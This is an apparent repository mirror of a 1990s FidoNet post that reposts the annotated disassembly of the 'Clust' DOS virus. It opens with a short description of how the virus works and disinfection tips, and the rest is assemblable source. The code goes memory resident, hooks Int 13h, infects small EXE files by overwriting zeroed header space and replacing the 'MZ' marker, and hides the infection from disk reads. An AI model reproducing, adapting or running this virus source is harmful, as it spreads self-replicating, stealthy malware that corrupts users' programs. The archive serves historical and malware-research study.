mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-07 02:45:27 +00:00
253 lines
8.0 KiB
NASM
253 lines
8.0 KiB
NASM
|
;<3B> PVT.VIRII (2:465/65.4) <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> PVT.VIRII <20>
|
|||
|
; Msg : 40 of 54
|
|||
|
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:15
|
|||
|
; To : - *.* - Fri 11 Nov 94 08:10
|
|||
|
; Subj : CLUST.ASM
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
;.RealName: Max Ivanov
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
;* Kicked-up by MeteO (2:5030/136)
|
|||
|
;* Area : VIRUS (Int: <20><><EFBFBD><EFBFBD>p<EFBFBD><70><EFBFBD><EFBFBD><EFBFBD> <20> <20><>p<EFBFBD><70><EFBFBD><EFBFBD>)
|
|||
|
;* From : Mike Salvino, 2:283/718 (06 Nov 94 17:48)
|
|||
|
;* To : Daniel Hendry
|
|||
|
;* Subj : CLUST.ASM
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
;@RFC-Path:
|
|||
|
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
|
|||
|
;18.n283!not-for-mail
|
|||
|
;@RFC-Return-Receipt-To: Mike.Salvino@f718.n283.z2.fidonet.org
|
|||
|
;Clust Virus from TridenT research group - small but fairly interesting,
|
|||
|
;it's one of the more advanced from TridenT that I've seen with the
|
|||
|
;possible exception of the TPE.
|
|||
|
|
|||
|
;This virus goes memory resident at the top of lower memory and hooks
|
|||
|
;Int 13h. Whenever an EXE file header is written, it checks to see
|
|||
|
;if there is a large field of 0's inside it (VERY common in EXE's)
|
|||
|
;and, if so, will put itself inside it and change the exe marker bytes
|
|||
|
;'MZ' to a jump to that code. In this way, it effectively converts the
|
|||
|
;file to a COM file when it is run. After this it re-executes the EXE
|
|||
|
;file. Because of a stealth handler on Int 13h function 2 (absolute
|
|||
|
;disk read) the EXE file is read as it originally was (the handler
|
|||
|
;zero's out the field in which it resides and restores the jump to
|
|||
|
;'MZ'). Because of the way this virus works, it can only infect
|
|||
|
;smaller EXE files.
|
|||
|
|
|||
|
;NOTE:
|
|||
|
;Several commands are commented out and have the actual bytes entered
|
|||
|
;next to them instead. This is because the compiler that Clust was
|
|||
|
;originally compiled on used different translations than mine, and
|
|||
|
;I wished to preserve the EXACT virus code.
|
|||
|
|
|||
|
;Disinfection: Because of this virus' stealth routine, disinfection should
|
|||
|
; be possible simply by Zipping or Arjing all EXE files on an
|
|||
|
; infected disk, then rebooting from a clean disk and unarchiving
|
|||
|
; the files. The original archiving MUST be done while the
|
|||
|
; virus is active in memory. Also - after rebooting - make
|
|||
|
; sure the program you use to unarchive the files is _NOT_
|
|||
|
; infected.
|
|||
|
|
|||
|
;Disassembly by Black Wolf
|
|||
|
|
|||
|
.model tiny
|
|||
|
.code
|
|||
|
org 100h
|
|||
|
|
|||
|
start:
|
|||
|
jmp short EntryPoint
|
|||
|
|
|||
|
LotsaNOPs db 122 dup (90h) ;Usually will be EXE header....
|
|||
|
|
|||
|
OldInt13 dd 0
|
|||
|
|
|||
|
EntryPoint:
|
|||
|
db 0e9h,7ch,0 ;jmp InstallVirus
|
|||
|
|
|||
|
Int13Handler:
|
|||
|
cmp ah,3
|
|||
|
je IsDiskWrite
|
|||
|
|
|||
|
cmp ah,2
|
|||
|
jne GoInt13
|
|||
|
|
|||
|
pushf
|
|||
|
call cs:OldInt13 ;Call Int 13h
|
|||
|
|
|||
|
jc Exit13Handler ;Exit on error.
|
|||
|
|
|||
|
cmp word ptr es:[bx],7EEBh ;Is sector infected?
|
|||
|
jne Exit13Handler
|
|||
|
|
|||
|
mov word ptr es:[bx],5A4Dh ;Cover mark with 'MZ'
|
|||
|
|
|||
|
push di cx ax ;Stealth routine.....
|
|||
|
mov cx,115h
|
|||
|
xor ax,ax
|
|||
|
db 89h,0dfh ;mov di,bx
|
|||
|
|
|||
|
;Zero out virus from
|
|||
|
add di,80h ;sector when it is read.
|
|||
|
rep stosb
|
|||
|
pop ax cx di
|
|||
|
|
|||
|
Exit13Handler:
|
|||
|
iret
|
|||
|
GoInt13:
|
|||
|
jmp cs:[OldInt13]
|
|||
|
IsDiskWrite:
|
|||
|
cmp word ptr es:[bx],5A4Dh ;Is EXE file being written?
|
|||
|
jne GoInt13
|
|||
|
|
|||
|
cmp word ptr es:[bx+4],75h ;Is file too large?
|
|||
|
jae GoInt13
|
|||
|
|
|||
|
push ax cx si di ds
|
|||
|
push es
|
|||
|
pop ds
|
|||
|
db 89h,0deh ;mov si,bx
|
|||
|
|
|||
|
add si,80h ;Look in EXE header....
|
|||
|
mov cx,115h
|
|||
|
AllZeros:
|
|||
|
lodsb
|
|||
|
cmp al,0
|
|||
|
loopz AllZeros
|
|||
|
|
|||
|
cmp cx,0 ;Check to see if entire field
|
|||
|
jne ExitInfectHandler ;was zeroed - leave if not.
|
|||
|
|
|||
|
|
|||
|
db 89h,0dfh ;mov di,bx
|
|||
|
add di,80h
|
|||
|
mov cx,115h
|
|||
|
mov si,offset OldInt13
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
rep movsb
|
|||
|
|
|||
|
db 89h,0dfh ;mov di,bx
|
|||
|
|
|||
|
;Copy virus
|
|||
|
;over zero area in EXE header.
|
|||
|
mov ax,7EEBh ;Stick in Jump over 'MZ'
|
|||
|
stosw
|
|||
|
|
|||
|
ExitInfectHandler:
|
|||
|
pop ds di si cx ax ;Allow Write to process now.
|
|||
|
jmp short GoInt13
|
|||
|
|
|||
|
InstallVirus:
|
|||
|
mov ax,3513h
|
|||
|
int 21h ;Get Int 13 addres
|
|||
|
mov word ptr cs:[OldInt13],bx
|
|||
|
mov word ptr cs:[OldInt13+2],es
|
|||
|
|
|||
|
mov ah,0Dh
|
|||
|
int 21h ;Flush disk buffers
|
|||
|
|
|||
|
mov ah,36h
|
|||
|
mov dl,0
|
|||
|
int 21h ;Get free space on default drive
|
|||
|
|
|||
|
mov ax,cs
|
|||
|
dec ax
|
|||
|
mov ds,ax
|
|||
|
cmp byte ptr ds:0,'Z' ;Are we the last chain?
|
|||
|
jne Terminate ;If not, terminate.
|
|||
|
|
|||
|
;sub word ptr ds:[3],39h ;subtract from MCB size
|
|||
|
db 81h,2eh,03,0,39h,0
|
|||
|
|
|||
|
;sub word ptr ds:[12h],39h ;subtract from PSP TopOfMem
|
|||
|
db 81h,2eh,12h,0,39h,0
|
|||
|
|
|||
|
mov si,offset OldInt13
|
|||
|
|
|||
|
db 89h,0f7h ;mov di,si
|
|||
|
|
|||
|
mov es,ds:[12h] ;ES = new segment
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
mov cx,115h ;Copy virus into memory
|
|||
|
rep movsb
|
|||
|
|
|||
|
mov ax,2513h
|
|||
|
push es
|
|||
|
pop ds
|
|||
|
mov dx,offset Int13Handler
|
|||
|
int 21h ;Set int 13 to virus handler
|
|||
|
|
|||
|
mov ah,4Ah
|
|||
|
push cs
|
|||
|
pop es
|
|||
|
mov bx,39h
|
|||
|
int 21h ;Modify mem alloc.
|
|||
|
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
mov bx,ds:[2ch] ;Get environment segment
|
|||
|
mov es,bx
|
|||
|
xor ax,ax
|
|||
|
mov di,1
|
|||
|
|
|||
|
ScanForFilename: ;Find name of file executed
|
|||
|
dec di ;in environment strings...
|
|||
|
scasw ;(located after two 0's)
|
|||
|
jnz ScanForFilename
|
|||
|
|
|||
|
lea si,[di+2]
|
|||
|
push bx
|
|||
|
pop ds ;DS = environment segment
|
|||
|
|
|||
|
push cs
|
|||
|
pop es ;ES = code segment
|
|||
|
|
|||
|
mov di,offset Filename
|
|||
|
push di
|
|||
|
xor bx,bx
|
|||
|
|
|||
|
CopyFilename:
|
|||
|
mov cx,50h
|
|||
|
inc bx
|
|||
|
lodsb
|
|||
|
cmp al,0
|
|||
|
jne StoreFilename ;Change zero at end of
|
|||
|
mov al,0Dh ;filename to a return
|
|||
|
|
|||
|
StoreFilename:
|
|||
|
stosb
|
|||
|
cmp al,0Dh ;If it was a return, we're
|
|||
|
loopnz CopyFilename ;done copying the filename
|
|||
|
|
|||
|
mov byte ptr ds:[28fh],bl
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
pop si
|
|||
|
dec si
|
|||
|
int 2Eh ;Re-execute EXE file with
|
|||
|
;Stealth handler in memory,
|
|||
|
;so Exe is run w/o virus.
|
|||
|
|
|||
|
Terminate:
|
|||
|
mov ah,4Ch
|
|||
|
int 21h
|
|||
|
|
|||
|
db 0
|
|||
|
Filename db 1
|
|||
|
|
|||
|
end start
|
|||
|
|
|||
|
;-+- Terminate 1.50/Pro
|
|||
|
; + Origin: Fred's Place (2:283/718)
|
|||
|
;=============================================================================
|
|||
|
;
|
|||
|
;Yoo-hooo-oo, -!
|
|||
|
;
|
|||
|
;
|
|||
|
; <20> The Me<4D>eO
|
|||
|
;
|
|||
|
;/zi,/zd,/zn Debug info: zi=full, zd=line numbers only, zn=none
|
|||
|
;
|
|||
|
;--- Aidstest Null: /Kill
|
|||
|
; * Origin: <20>PVT.ViRII<49>main<69>board<72> / Virus Research labs. (2:5030/136)
|
|||
|
|